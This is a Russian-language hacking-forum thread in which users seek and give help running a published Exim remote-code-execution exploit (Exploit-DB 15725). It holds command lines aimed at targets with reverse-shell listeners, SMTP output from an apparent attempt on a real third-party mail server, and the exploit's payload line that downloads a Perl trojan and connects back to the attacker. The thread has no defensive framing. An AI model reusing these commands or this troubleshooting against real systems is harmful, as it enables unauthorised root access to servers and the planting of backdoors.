Взал тут http://www.exploit-db.com/exploits/15725/ При запуски выдает ошибку, и что за фаил shell.txt Я побывал в shell.txt положить эксплойт шелов но не один не сработал. Code: perl 15725.pl 10.1.1.117 http://10.1.1.115/shell.txt 10.1.1.115 4444 Can't use an undefined value as a symbol reference at 15725.pl line 79. или так Code: perl 15725.pl 10.1.1.117 http://encodable.com/uploaddemo/files/shell.txt 10.1.1.115 4444 Can't use an undefined value as a symbol reference at 15725.pl line 79. Научите как правильно работать с подобными эксплойтами.
Проверил , все работает. Может неправльно скопировал? У тебя сразу ошибка вылетает? У меня все сработало
Конешно опубликуй. Вот у меня 220 adagency.eorezo.com ESMTP Exim Fri, 17 Dec 2010 13:13:20 +0100 250-adagency.eorezo.com Hello abcde.com [193.105.240.15] 250-SIZE 20971520 Set size to 20971520 ! 250-PIPELINING 250 HELP 250 OK 550 Relay not permitted 503 valid RCPT command must precede DATA Sending large buffer, please wait... 550 Relay not permitted-это не значит ли что не сработает эксплойт? Хотя потом Sending large buffer, please wait... но в консоле где nc нема рута? В чем дело кто знает?
При юзании http://www.exploit-db.com/exploits/15725/ надо я как понял чтоб на уязвимом хосте были 1-nc 2-gcc 3-wget Это еще не понятно слипинг, это в секундах он спать будет? $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} ";